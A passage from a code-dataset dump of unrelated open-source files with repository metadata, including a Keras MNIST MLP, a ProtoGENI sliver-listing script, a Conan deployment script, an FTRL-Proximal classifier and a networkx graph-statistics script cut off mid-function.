for roi_contour in ds.ROIContourSequence:
# Ensure same type
if str(roi_contour.ReferencedROINumber) == str(roi_number):
return roi_contour.ContourSequence
raise Exception(f"Referenced ROI number '{roi_number}' not found")
|
mit
| -1,413,595,311,255,209,200
| 41.067308
| 134
| 0.729829
| false
| 3.461234
| false
| false
| false
|
roatienza/dl-keras
|
chapter2-neural-networks/mlp-mnist-data_augment-2.1.7.py
|
1
|
3959
|
'''
A MLP network for MNIST digits classification
Project: https://github.com/roatienza/dl-keras
Usage: python3 <this file>
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# numpy package
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.preprocessing.image import ImageDataGenerator
from keras.datasets import mnist
from keras.utils import to_categorical
# load mnist dataset
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# compute the number of labels
num_labels = np.amax(y_train) + 1
# convert to one-hot vector
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
# image dimensions (assumed square)
image_size = x_train.shape[1]
input_size = image_size * image_size
# we train our network using float data
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# network parameters
batch_size = 128
hidden_units = 256
dropout = 0.45
data_augmentation = False
epochs = 20
max_batches = 2 * len(x_train) / batch_size
# this is 3-layer MLP with ReLU after each layer
model = Sequential()
model.add(Dense(hidden_units, input_dim=input_size))
model.add(Activation('relu'))
model.add(Dense(hidden_units))
model.add(Activation('relu'))
model.add(Dense(num_labels))
# this is the output for one-hot vector
model.add(Activation('softmax'))
model.summary()
# loss function for one-hot vector
# use of adam optimizer
# accuracy is good metric for classification tasks
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
# validate the model on test dataset to determine generalization
# score = model.evaluate(x_test, y_test, batch_size=batch_size)
# print("\nTest accuracy: %.1f%%" % (100.0 * score[1]))
# Run training, with or without data augmentation.
if not data_augmentation:
print('Not using data augmentation.')
# train the network no data augmentation
x_train = np.reshape(x_train, [-1, input_size])
model.fit(x_train, y_train, epochs=epochs, batch_size=batch_size)
else:
print('Using real-time data augmentation.')
# This will do preprocessing and realtime data augmentation:
# we need [width, height, channel] dim for data aug
x_train = np.reshape(x_train, [-1, image_size, image_size, 1])
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
rotation_range=5.0, # randomly rotate images in the range (deg 0 to 180)
width_shift_range=0.0, # randomly shift images horizontally
height_shift_range=0.0, # randomly shift images vertically
horizontal_flip=False, # randomly flip images
vertical_flip=False) # randomly flip images
# Compute quantities required for featurewise normalization
# (std, mean, and principal components if ZCA whitening is applied).
datagen.fit(x_train)
for e in range(epochs):
batches = 0
for x_batch, y_batch in datagen.flow(x_train, y_train, batch_size=batch_size):
x_batch = np.reshape(x_batch, [-1, input_size])
model.fit(x_batch, y_batch, verbose=0)
batches += 1
print("Epoch %d/%d, Batch %d/%d" % (e+1, epochs, batches, max_batches))
if batches >= max_batches:
# we need to break the loop by hand because
# the generator loops indefinitely
break
# Score trained model.
x_test = np.reshape(x_test, [-1, input_size])
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
|
mit
| 4,741,922,929,612,429,000
| 35.657407
| 86
| 0.691589
| false
| 3.488106
| true
| false
| false
|
nmc-probe/emulab-nome
|
protogeni/test/listactiveslivers.py
|
1
|
1713
|
#! /usr/bin/env python
#
# Copyright (c) 2008-2014 University of Utah and the Flux Group.
#
# {{{GENIPUBLIC-LICENSE
#
# GENI Public License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#
# }}}
#
#
#
import sys
import pwd
import getopt
import os
import re
import xmlrpclib
from M2Crypto import X509
execfile( "test-common.py" )
if admincredentialfile:
f = open( admincredentialfile )
mycredential = f.read()
f.close()
else:
Fatal("You need to supply an admin credential");
pass
#
# Ask manager for its list.
#
params = {}
params["credentials"] = (mycredential,)
rval,response = do_method("cm", "ListActiveSlivers", params)
if rval:
Fatal("Could not get a list of resources")
pass
print response[ "value" ]
|
agpl-3.0
| -7,036,149,344,814,738,000
| 27.55
| 72
| 0.737303
| false
| 3.652452
| false
| false
| false
|
polysquare/polysquare-ci-scripts
|
ciscripts/deploy/conan/deploy.py
|
1
|
4874
|
# /ciscripts/deploy/conan/deploy.py
#
# Copy directories into place to prepare for publishing conan project
#
# See /LICENCE.md for Copyright information
"""Copy directories into place to prepare for publishing conan project."""
import argparse
import json
import os
from contextlib import contextmanager
try:
from io import StringIO
except ImportError:
from cStringIO import StringIO # suppress(import-error)
def _get_python_container(cont, util, shell):
"""Get a python 3 installation."""
py_ver = util.language_version("python3")
config_python = "setup/project/configure_python.py"
return cont.fetch_and_import(config_python).get(cont,
util,
shell,
py_ver)
def updated_dict(input_dict, update):
"""Apply update to input_dict and return the result."""
copy = input_dict.copy()
copy.update(update)
return copy
@contextmanager
def temporary_environment(environment):
"""Run child code inside temporarily set environment variables."""
try:
backup = os.environ.copy()
os.environ = environment
yield os.environ
finally:
os.environ = backup
@contextmanager
def captured_messages(util):
"""Capture printed messages."""
old_buffer = util.PRINT_MESSAGES_TO
try:
util.PRINT_MESSAGES_TO = StringIO()
yield util.PRINT_MESSAGES_TO
finally:
util.PRINT_MESSAGES_TO = old_buffer
# suppress(too-many-arguments)
def run_deploy(cont, util, pkg_name, version, block):
"""Run the deploy step and set CONAN_VERSION_OVERRIDE to version."""
update = {"CONAN_VERSION_OVERRIDE": version} if version else {}
upload_desc = "{pkg}/{version}@{block}".format(pkg=pkg_name,
version=version,
block=block)
with util.Task("""Deploying {} to conan""".format(upload_desc)):
with temporary_environment(updated_dict(os.environ, update)):
util.execute(cont,
util.running_output,
"conan",
"export",
block)
util.execute(cont,
util.running_output,
"conan",
"upload",
upload_desc)
def run(cont, util, shell, argv=None):
"""Copy directories into place to prepare for publishing conan project."""
parser = argparse.ArgumentParser("""Conan deployment""")
parser.add_argument("--package-name",
help="""Package name""",
type=str,
required=True)
result = parser.parse_args(argv)
assert os.path.exists("conan_keys")
with open("conan_keys", "r") as conan_keys_file:
conan_keys = json.loads(conan_keys_file.read())
username = conan_keys["username"]
password = conan_keys["password"]
os.environ["REPO_API_KEY"] = str(conan_keys["repo_api_key"])
cont.fetch_and_import("deploy/project/deploy.py").run(cont,
util,
shell)
block = "{user}/{pkg}".format(user=username,
pkg=result.package_name)
cont.fetch_and_import("deploy/project/deploy.py").run(cont,
util,
shell,
["--bump-version-on",
"conanfile.py"])
with _get_python_container(cont, util, shell).activated(util):
with captured_messages(util) as version_stream:
util.execute(cont,
util.running_output,
"python",
"-c",
"import conanfile; "
"print(conanfile.VERSION)")
version_stream.seek(0)
version = str(version_stream.read()).strip()
with util.Task("""Logging in as {}""".format(username)):
util.execute(cont,
util.running_output,
"conan",
"user",
username,
"-p",
password)
run_deploy(cont,
util,
result.package_name,
"master",
block)
run_deploy(cont,
util,
result.package_name,
version,
block)
|
mit
| -7,925,659,697,915,147,000
| 33.083916
| 79
| 0.489536
| false
| 4.878879
| false
| false
| false
|
fmfn/FTRLp
|
FTRLp.py
|
1
|
31553
|
from __future__ import division
from __future__ import print_function
"""
------------ Follow The Regularized Leader - Proximal ------------
FTRL-P is an online classification algorithm that combines both L1 and L2
norms, particularly suited for large data sets with extremely high dimensionality.
This implementation follow the algorithm by H. B. McMahan et. al. It minimizes
the LogLoss function iteratively with a combination of L2 and L1 (centralized
at the current point) norms and adaptive, per coordinate learning rates.
This algorithm is efficient at obtaining sparsity and has proven to perform
very well in massive Click-Through-Rate prediction tasks.
This module contains two objects...
References:
* Follow-the-Regularized-Leader and Mirror Descent: Equivalent Theorems
and L1 Regularization, H. Brendan McMahan
* Ad Click Prediction: a View from the Trenches, H. Brendan McMahan et. al.
"""
from math import log, exp, fabs, sqrt
from csv import DictReader
from datetime import datetime
from random import random
from hashlib import sha256
def log_loss(y, p):
"""
--- Log_loss computing function
A function to compute the log loss of a predicted probability p given
a true target y.
:param y: True target value
:param p: Predicted probability
:return: Log loss.
"""
p = max(min(p, 1. - 10e-15), 10e-15)
return -log(p) if y == 1 else -log(1. - p)
def to_hash(value):
"""
Hashes values for hashing trick.
Treats numbers as strings.
:param value: Any value that should be trated as category.
:return: hashed value.
"""
if not isinstance(value, bytes):
value = str(value).encode('utf-8')
hex_value = sha256(value).hexdigest()
int_hash = int(hex_value, 16)
return int_hash
class DataGen(object):
"""
DataGen is an object to generate the data that is fed to the
classifier.
It reads the data file one row at a time, hashes it
and returns it.
The names and types of columns must be passed to it, so that categorical,
target, numerical and identification columns can be treated differently.
It also keeps track of the name and position of all features to allow
the classifier to keep track of the coefficients by feature.
"""
def __init__(self, max_features, target, descriptive=(), categorical=(), numerical=None, transformation=None):
"""
The object initialized with the maximum number of features to be generated and the
names of the appropriate columns.
Categorical columns are hashed while numerical columns are kept as is, therefore
care must be taken with normalization and pre processing.
:param max_features: The maximum number of features to generate. It includes all
numerical and categorical features. Must be greater than the
number of numerical features.
:param target: The name of the target variable. It must be a binary variable taking
values in {0, 1}.
:param descriptive: Descriptive features that are used to identify the samples but
are not to be used for modelling, such as IDs, public
identifiers, etc.
:param categorical: Categorical variable to be hashed.
:param numerical: Numerical variable. These will not be hashed but will be used in
the modelling phase.
"""
# --- Instance variables.
# Instance variables are created for columns names and the number of numerical
# columns in addition to all of the object's parameters.
# Stores the maximum number of features to generate while hashing
self.mf = max_features
# Stores the name of the target variable.
self.y = target
# Stores a list with the names of all descriptive variables.
self.ids = descriptive
# Stores a list with the names of all categorical variables.
self.cat = categorical
# Stores a list with the names of all numerical variables.
self.num = numerical
# Stores a dictionary with the names of numerical variable to apply a given function to.
self.tra = transformation if transformation is not None else {}
# Dictionary to store names
self.names = {}
# --- Numerical features
# Numerical features are indexed in sorted order. The number
# of features is determined by the variable size. The value
# of each feature is just the value read from the file. Start
# by defining what is numeric. If the user does not pass the
# names of all numerical features, the code will assume
# every columns that is not id, target or categorical is
# numeric and find their name when the training process begin.
if self.num is not None:
self.num_cols = sorted(self.num)
# Store the names in our names dictionary
self.names.update(dict(zip(self.num_cols, range(len(self.num_cols)))))
else:
self.num_cols = []
# --- Something to build model on
# Make sure the user passed some information on the columns to
# be used to build the model upon
assert len(self.cat) + len(self.num_cols) > 0, 'At least one categorical or numerical feature must ' \
'be provided.'
def _fetch(self, path):
"""
This method is the core reason this object exists. It is a python generator
that hashes categorical variables, combines them to numerical variables and
yields all the relevant information, row by row.
:param path: Path of the data file to be read.
:return: YIELDS the current row, ID information, feature values and the target value.
even if the file does not contain a target field it returns a target value
of zero anyway.
"""
for t, row in enumerate(DictReader(open(path))):
# --- Variables
# t: The current line being read
# row: All the values in this line
# --- Ids and other descriptive fields
# Process any descriptive fields and put it all in a list.
ids = []
for ID in self.ids:
ids.append(row[ID])
del row[ID]
# --- Target
# Process target and delete its entry from row if it exists
# otherwise just ignore and move along
y = 0.
if self.y in row:
if row[self.y] == '1':
y = 1.
del row[self.y]
# --- Features
# Initialize an empty dictionary to hold feature
# indexes and their corresponding values.
#
x = {}
# --- Enough features?
# For the very first row make sure we have enough features (max features
# is large enough) by computing the number of numerical columns and
# asserting that the maximum number of features is larger than it.
if t == 0:
# --- Hash size
# Computes a constant to add to hash index, it dictates the
# number of features that will not be hashed
num_size = len(self.num_cols)
size = num_size + len(self.tra)
# Make sure there is enough space for hashing
assert self.mf > size, 'Not enough dimensions to fit all features.'
# --- Numerical Variables
# Now we loop over numerical variables
for i, key in enumerate(self.num_cols):
# --- No transformation
# If no transformation is necessary, just store the actual value
# of the variable.
x[i] = float(row[key])
# --- Transformations
# Create on the fly transformed variables. The user passes a map of the
# name of the new variable to a tuple containing the name of the original
# variable to be transformed and the function to be applied to it.
# Once completed the new name is appended to the names dictionary with its
# corresponding index.#
for i, key in enumerate(self.tra):
# Start by addition to the data array x the new transformed values
# by looping over new_features and applying the transformation to the
# desired old feature.
x[num_size + i] = self.tra[key][1](row[self.tra[key][0]])
# Create a key in names dictionary with the new name and its
# corresponding index.
self.names[key] = num_size + i
# --- Categorical features
# Categorical features are hashed. For each different kind a
# hashed index is created and a value of 1 is 'stored' in that
# position.
for key in self.cat:
# --- Category
# Get the categorial variable from row
value = row[key]
# --- Hash
# One-hot encode everything with hash trick
index = to_hash(key + '_' + value) % (self.mf - size) + size
x[index] = 1.
# --- Save Name
# Save the name and index to the names dictionary if its a new feature
# AND if there's still enough space.
if key + '_' + value not in self.names and len(self.names) < self.mf:
self.names[key + '_' + value] = index
# Yield everything.
yield t, ids, x, y
def train(self, path):
"""
The train method is just a wrapper around the _fetch generator to comply
with sklearn's API.
:param path: The path for the training file.
:return: YIELDS row, features, target value
"""
# --- Generates train data
# This is just a generator on top of the basic _fetch. If this was python 3 I
# could use 'yield from', but I don't think this syntax exists in python 2.7,
# so I opted to use the explicit, less pythonic way.
for t, ids, x, y in self._fetch(path):
# --- Variables
# t: Current row
# ids: List of ID information
# x: Feature values
# y: Target values
yield t, x, y
def test(self, path):
"""
The test method is just a wrapper around the _fetch generator to comply
with sklearn's API.
:param path: The path for the test file.
:return: YIELDS row, features
"""
# --- Generates test data
# This is just a generator on top of the basic _fetch. If this was python 3 I
# could use 'yield from', but I don't think this syntax exists in python 2.7,
# so I opted to use the explicit, less pythonic way.
for t, ids, x, y in self._fetch(path):
# --- Variables
# t: Current row
# ids: List of ID information
# x: Feature values
# y: Target values
yield t, x
class FTRLP(object):
"""
--- Follow The Regularized Leader - Proximal ---
FTRL-P is an online classification algorithm that combines both L1 and L2
norms, particularly suited for large data sets with extremely high dimensionality.
This implementation follow the algorithm by H. B. McMahan et. al. It minimizes
the LogLoss function iteratively with a combination of L2 and L1 (centralized
at the current point) norms and adaptive, per coordinate learning rates.
This algorithm is efficient at obtaining sparsity and has proven to perform
very well in massive Click-Through-Rate prediction tasks.
References:
* Follow-the-Regularized-Leader and Mirror Descent: Equivalent Theorems
and L1 Regularization, H. Brendan McMahan
* Ad Click Prediction: a View from the Trenches, H. Brendan McMahan et. al.
"""
def __init__(self, alpha=1, beta=1, l1=1, l2=1, subsample=1, epochs=1, rate=0):
"""
Initializes the classifier's learning rate constants alpha and beta,
the regularization constants L1 and L2, and the maximum number of
features (limiting factor of the hash function).
The per feature learning rate is given by:
eta = alpha / ( beta + sqrt( sum g**g ) )
:param alpha: Learning rate's proportionality constant.
:param beta: Learning rate's parameter.
:param l1: l1 regularization constant.
:param l2: l2 regularization constant.
:return:
"""
# --- Classifier Parameters
# The FTRLP algorithm has four free parameters that can be tuned as pleased.
# Learning rate's proportionality constant.
self.alpha = alpha
# Learning rate's parameter.
self.beta = beta
# L1 regularization constant.
self.l1 = l1
# L2 regularization constant.
self.l2 = l2
# --- Log likelihood
# Stores the log likelihood during the whole
# fitting process.
self.log_likelihood_ = 0
self.loss = []
# --- Weight parameters.
# Lists and dictionaries to hold the weights. Initiate
# the weight vector z and learning rate n as None so that
# when self.train is called multiple times it will not
# overwrite the stored values. This essentially allows epoch
# training to take place, albeit a little bit ugly.
self.z = None
self.n = None
# The weight vector used for prediction is constructed on the fly
# and, in order to keep the memory cost low, it is a dictionary
# that receives values and keys as needed.
# --- Coefficients
# Lists to store the coefficients and their corresponding names.
# Initialized to None and constructed once the training method is
# completed. In case of multiple epochs, these quantities will be
# computed multiple times.
self.coef_ = {}
self.cname = None
# --- Target Ratio
# Store the ratio of each class of a binnary target variable to use
# it to make weighted discrete label predictions.
self.target_ratio = 0.
# --- Printing Rate
# Number of samples to train and predict on before printing
# current status
self.rate = rate
# --- Subsample
# While online methods can't be shuffle, combining subsampling of
# the training set with multiple epoch training gives similar results.
self.subsample = subsample
# --- Epochs
# something...
self.epochs = epochs
# --- Flag for partial fit
# Keeps a flag to allow the user to train multiple times
# without overwriting the object.
self.fit_flag = False
def _build_p(self, data_gen, path):
# Maybe is worth migrating the weight construction algorithm
# to here, I think it could clean up the code a little a bit
# in both train and predict methods.
pass
def _clear_params(self):
"""
If the fit method is called multiple times, all trained parameters
must be cleared allowing for a fresh start. This function simply
resets everything back to square one.
:return: Nothing
"""
# All models parameters are set to their original value (see
# __init__ description
self.log_likelihood_ = 0
self.loss = []
self.z = None
self.n = None
self.coef_ = {}
self.cname = None
def get_params(self, deep=True):
"""
A function to return a map of parameters names and values.
:param deep: Not sure yet, gotta check sklearn usage.
:return: Dictionary mapping parameters names to their values
"""
ps = {'alpha': self.alpha,
'beta': self.beta,
'l1': self.l1,
'l2': self.l2,
'subsample': self.subsample,
'epochs': self.epochs,
'rate': self.rate}
return ps
def set_params(self, **params):
"""
:param params:
:return:
"""
for key, value in params.iteritems():
setattr(self, key, value)
def _update(self, y, p, x, w):
"""
# --- Update weight vector and learning rate.
# With the prediction round completed we can proceed to
# updating the weight vector z and the learning rate eta
# based on the last observed label.
# To do so we will use the computed probability and target
# value to find the gradient loss and continue from there.
# The gradient for the log likelihood for round t can easily
# be shown to be:
# g_i = (p - y) * x_i, (round t)
# The remaining quantities are updated according to the
# minimization procedure outlined in [2].
:param y: True target variable
:param p: Predicted probability for the current sample
:param x: Non zero feature values
:param w: Weights
:return: Nothing
"""
# --- Update loop
# Loop over all relevant indexes and update all values
# accordingly.
for i in x.keys():
# --- Compute Gradient of LogLoss
g = (p - y) * x[i]
# --- Update constant sigma
# Note that this upgrade is equivalent to
# (eta_(t, i))^-1 - (eta_(t - 1, i))^-1
# as discussed in [2].
s = (sqrt(self.n[i] + g * g) - sqrt(self.n[i])) / self.alpha
# --- Increment changes
# Finally, increment the appropriate changes to weights and
# learning rate vectors.
self.z[i] += g - s * w[i]
self.n[i] += g * g
def _train(self, data_gen, path):
"""
--- Fitting method ---
Online fitting method. It takes one sample at a time, builds
the weight vector on the fly and computes the dot product of
weight vector and values and a prediction is made.
Then the true label of the target variable is observed and the
loss is added.
Once this is completed the weights are updated based on the
previously observed values.
:param data_gen: An instance of the DataGen class
:param path: The path to the training set
:return:
"""
# Best way? Proper coding means no access to protected members...
if self.z is None and self.n is None:
self.z = [0.] * data_gen.mf
self.n = [0.] * data_gen.mf
# --- Start the clock!
start_time = datetime.now()
for t, x, y in data_gen.train(path):
# --- Variables
# t: Current row
# x: Feature values
# y: Target values
# --- Target Ratio Update
# Rolling calculation of the target average
self.target_ratio = (1.0 * (t * self.target_ratio + y)) / (t + 1)
# --- Stochastic sample selection
# Chose whether or not to use a sample in
# training time. Since online methods can't
# really be shuffle we can use this combined
# with multiple epochs to create heterogeneity.
#if random() > self.subsample and ((t + 1) % self.rate != 0):
if random() > self.subsample and (t + 1) % self.rate != 0:
continue
# --- Dot product init.
# The dot product is computed as the weights are calculated,
# here it is initiated at zero.
wtx = 0
# --- Real time weights
# Initialize an empty dictionary to hold the weights
w = {}
# --- Weights and prediction
# Computes the weights for numerical features using the
# indexes and values present in the x dictionary. And make
# a prediction.
# This first loop build the weight vector on the fly. Since
# we expect most weights to be zero, the weight vector can
# be constructed in real time. Furthermore, there is no
# reason to store it, neither to clear it, since at each
# iteration only the relevant indexes are populated and used.
for indx in x.keys():
# --- Loop over indicator I
# x.keys() carries all the indexes of the feature
# vector with non-zero entries. Therefore, we can
# simply loop over it since anything else will not
# contribute to the dot product w.x, and, consequently
# to the prediction.
if fabs(self.z[indx]) <= self.l1:
# --- L1 regularization
# If the condition on the absolute value of the
# vector Z is not met, the weight coefficient is
# set exactly to zero.
w[indx] = 0
else:
# --- Non zero weight
# Provided abs(z_i) is large enough, the weight w_i
# is computed. First, the sign of z_i is determined.
sign = 1. if self.z[indx] >= 0 else -1.
# Then the value of w_i if computed and stored. Note
# that any previous value w_i may have had will be
# overwritten here. Which is fine since it will not
# be used anywhere outside this (t) loop.
w[indx] = - (self.z[indx] - sign * self.l1) / \
(self.l2 + (self.beta + sqrt(self.n[indx])) / self.alpha)
# --- Update dot product
# Once the value of w_i is computed we can use to compute
# the i-th contribution to the dot product w.x. Which, here
# is being done inside the index loop, compute only coordinates
# that could possible be non-zero.
wtx += w[indx] * x[indx]
# --- Make a prediction
# With the w.x dot product in hand we can compute the output
# probability by putting wtx through the sigmoid function.
# We limit wtx value to lie in the [-35, 35] interval to
# avoid round off errors.
p = 1. / (1. + exp(-max(min(wtx, 35.), -35.)))
# --- Update the loss function
# Now we look at the target value and use it, together with the
# output probability that was just computed to find the loss we
# suffer this round.
self.log_likelihood_ += log_loss(y, p)
# --- Verbose section
if (self.rate > 0) and (t + 1) % self.rate == 0:
# Append to the loss list.
self.loss.append(self.log_likelihood_)
# Print all the current information
print('Training Samples: {0:9} | '
'Loss: {1:11.2f} | '
'Time taken: {2:4} seconds'.format(t + 1,
self.log_likelihood_,
(datetime.now() - start_time).seconds))
# --- Update weights
# Finally, we now how well we did this round and move on to
# updating the weights based on the current status of our
# knowledge.
self._update(y, p, x, w)
# --- Coefficient names and indexes
# Bind the feature names to their corresponding coefficient obtained from
# the regression.
self.coef_.update(dict([[key, self.z[data_gen.names[key]]] for key in data_gen.names.keys()]))
def fit(self, data_gen, path):
"""
Epoch wrapper around the main fitting method _train
:param data_gen: An instance of the DataGen class
:param path: The path to the training set
:return:
"""
# --- Check fit flag
# Make sure the fit methods is starting from a clean slate by
# checking the fit_flag variable and calling the _clear_params
# function if necessary.
# While always calling _clear_params would do the job, by setting
# this flag we are also able to call fit multiple times WITHOUT
# clearing all parameters --- See partial_fit.
if self.fit_flag:
self._clear_params()
# --- Start the clock!
total_time = datetime.now()
# Train epochs
for epoch in range(self.epochs):
# --- Start the clock!
epoch_time = datetime.now()
# --- Verbose
# Print epoch if verbose is turned on
if self.rate > 0:
print('TRAINING EPOCH: {0:2}'.format(epoch + 1))
print('-' * 18)
self._train(data_gen, path)
# --- Verbose
# Print time taken if verbose is turned on
if self.rate > 0:
print('EPOCH {0:2} FINISHED IN {1} seconds'.format(epoch + 1,
(datetime.now() - epoch_time).seconds))
print()
# --- Verbose
# Print fit information if verbose is on
if self.rate > 0:
print(' --- TRAINING FINISHED IN '
'{0} SECONDS WITH LOSS {1:.2f} ---'.format((datetime.now() - total_time).seconds,
self.log_likelihood_))
print()
# --- Fit Flag
# Set fit_flag to true. If fit is called again this is will trigger
# the call of _clean_params. See partial_fit for different usage.
self.fit_flag = True
def partial_fit(self, data_gen, path):
"""
Simple solution to allow multiple fit calls without overwriting
previously calculated weights, losses and etc.
:param data_gen: An instance of the DataGen class
:param path: The path to the training set
:return:
"""
# --- Fit Flag
# Start by reseting fit_flag to false to "trick"
# the fit method into keep training without overwriting
# previously calculated quantities.
self.fit_flag = False
# --- Fit
# Call the fit method and proceed as normal
self.fit(data_gen, path)
def predict_proba(self, data_gen, path):
"""
--- Predicting Probabilities method ---
Predictions...
:param data_gen: An instance of the DataGen class
:param path: The path to the test set
:return: A list with predicted probabilities
"""
# --- Results
# Initialize an empty list to hold predicted values.
result = []
# --- Start the clock!
start_time = datetime.now()
for t, x in data_gen.test(path):
# --- Variables
# t: Current row
# x: Feature values
# --- Dot product init.
# The dot product is computed as the weights are calculated,
# here it is initiated at zero.
wtx = 0
# --- Real time weights
# Initialize an empty dictionary to hold the weights
w = {}
# --- Weights and prediction
# Computes the weights for numerical features using the
# indexes and values present in the x dictionary. And make
# a prediction.
# This first loop build the weight vector on the fly. Since
# we expect most weights to be zero, the weight vector can
# be constructed in real time. Furthermore, there is no
# reason to store it, neither to clear it, since at each
# iteration only the relevant indexes are populated and used.
for indx in x.keys():
# --- Loop over indicator I
# x.keys() carries all the indexes of the feature
# vector with non-zero entries. Therefore, we can
# simply loop over it since anything else will not
# contribute to the dot product w.x, and, consequently
# to the prediction.
if fabs(self.z[indx]) <= self.l1:
# --- L1 regularization
# If the condition on the absolute value of the
# vector Z is not met, the weight coefficient is
# set exactly to zero.
w[indx] = 0
else:
# --- Non zero weight
# Provided abs(z_i) is large enough, the weight w_i
# is computed. First, the sign of z_i is determined.
sign = 1. if self.z[indx] >= 0 else -1.
# Then the value of w_i if computed and stored. Note
# that any previous value w_i may have had will be
# overwritten here. Which is fine since it will not
# be used anywhere outside this (t) loop.
w[indx] = - (self.z[indx] - sign * self.l1) / \
(self.l2 + (self.beta + sqrt(self.n[indx])) / self.alpha)
# --- Update dot product
# Once the value of w_i is computed we can use to compute
# the i-th contribution to the dot product w.x. Which, here
# is being done inside the index loop, compute only coordinates
# that could possible be non-zero.
wtx += w[indx] * x[indx]
# --- Make a prediction
# With the w.x dot product in hand we can compute the output
# probability by putting wTx through the sigmoid function.
# We limit wTx value to lie in the [-35, 35] interval to
# avoid round off errors.
result.append(1. / (1. + exp(-max(min(wtx, 35.), -35.))))
# Verbose section - Still needs work...
if (t + 1) % self.rate == 0:
# print some stuff
print('Test Samples: {0:8} | '
'Time taken: {1:3} seconds'.format(t + 1,
(datetime.now() - start_time).seconds))
# All done, return the predictions!
return result
def predict(self, data_gen, path):
"""
--- Predicting method ---
Predictions...
:param data_gen: An instance of the DataGen class
:param path: The path to the test set
:return: A list with predicted probabilities
"""
# --- Probabilities
# Compute probabilities by invoking the predict_proba method
probs = self.predict_proba(data_gen, path)
# --- Return
# Return binary labels. The threshold is set using the mean value of the
# target variable.
return map(lambda x: 0 if x <= self.target_ratio else 1, probs)
|
mit
| -5,593,943,148,002,153,000
| 37.527473
| 114
| 0.565461
| false
| 4.608969
| false
| false
| false
|
abitofalchemy/hrg_nets
|
bters.py
|
1
|
13299
|
import shelve
import networkx as nx
import pandas as pd
import numpy as np
import math
import os
import sys
import re
import argparse
import traceback
import net_metrics as metrics
from glob import glob
__version__ = "0.1.0"
__author__ = ['Salvador Aguinaga']
# alchemee analyze the BTER generated graphs
def get_basic_stats(grphs,gen_mod, name):
df = pd.DataFrame()
for g in grphs:
tdf = [pd.Series(g.degree().values()).mean(), pd.Series(nx.clustering(g).values()).mean()]
df = df.append([tdf])
df.columns=['avg_k','avg_cc']
df.to_csv()
def get_degree_dist(grphs,gen_mod, name):
mf = pd.DataFrame()
for g in grphs:
d = g.degree()
df = pd.DataFrame.from_dict(d.items())
gb = df.groupby([1]).count()
mf = pd.concat([mf, gb], axis=1)
mf['pk'] = mf.mean(axis=1)/float(g.number_of_nodes())
mf['k'] = mf.index.values
#print mf
out_tsv = '../Results/{}_{}_degree.tsv'.format(name,gen_mod)
mf[['k','pk']].to_csv(out_tsv, sep='\t', index=False, header=True, mode="w")
def get_clust_coeff(grphs,gen_mod, name):
mf = pd.DataFrame()
for g in grphs:
df = pd.DataFrame.from_dict(g.degree().items())
df.columns=['v','k']
cf = pd.DataFrame.from_dict(nx.clustering(g).items())
cf.columns=['v','cc']
df = pd.merge(df,cf,on='v')
mf = pd.concat([mf, df])
gb = mf.groupby(['k']).mean()
out_tsv = "../Results/{}_{}_clustering.tsv".format(name,gen_mod)
gb[['cc']].to_csv(out_tsv, sep="\t", header=True, index=True)
def degree_prob_distributuion(orig_g_M, otherModel_M, name):
print 'draw degree probability distribution'
if orig_g_M is not None:
dorig = pd.DataFrame()
for g in orig_g_M:
d = g.degree()
df = pd.DataFrame.from_dict(d.items())
gb = df.groupby(by=[1])
dorig = pd.concat([dorig, gb.count()], axis=1) # Appends to bottom new DFs
print "---<>--- orig", name
if not dorig.empty :
zz = len(dorig.mean(axis=1).values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(dorig.mean(axis=1).values), sa):
print "(" + str(dorig.mean(axis=1).index[x]) + ", " + str(dorig.mean(axis=1).values[x]) + ")"
if otherModel_M is not None:
dorig = pd.DataFrame()
for g in otherModel_M:
d = g.degree()
df = pd.DataFrame.from_dict(d.items())
gb = df.groupby(by=[1])
dorig = pd.concat([dorig, gb.count()], axis=1) # Appends to bottom new DFs
print "---<>--- otherModel_M", name
if not dorig.empty :
zz = len(dorig.mean(axis=1).values)
sa = int(math.ceil(zz/float(75)))
for x in range(0, len(dorig.mean(axis=1).values), sa):
print "(" + str(dorig.mean(axis=1).index[x]) + ", " + str(dorig.mean(axis=1).values[x]) + ")"
def network_value_distribution(orig_g_M, otherModel_M, name):
eig_cents = [nx.eigenvector_centrality_numpy(g) for g in orig_g_M] # nodes with eigencentrality
net_vals = []
for cntr in eig_cents:
net_vals.append(sorted(cntr.values(), reverse=True))
df = pd.DataFrame(net_vals)
print "orig"
l = list(df.mean())
zz = float(len(l))
if not zz == 0:
sa = int(math.ceil(zz/75))
for i in range(0, len(l), sa):
print "(" + str(i) + "," + str(l[i]) + ")"
eig_cents = [nx.eigenvector_centrality_numpy(g) for g in otherModel_M] # nodes with eigencentrality
net_vals = []
for cntr in eig_cents:
net_vals.append(sorted(cntr.values(), reverse=True))
df = pd.DataFrame(net_vals)
print "other model"
l = list(df.mean())
zz = float(len(l))
if not zz == 0:
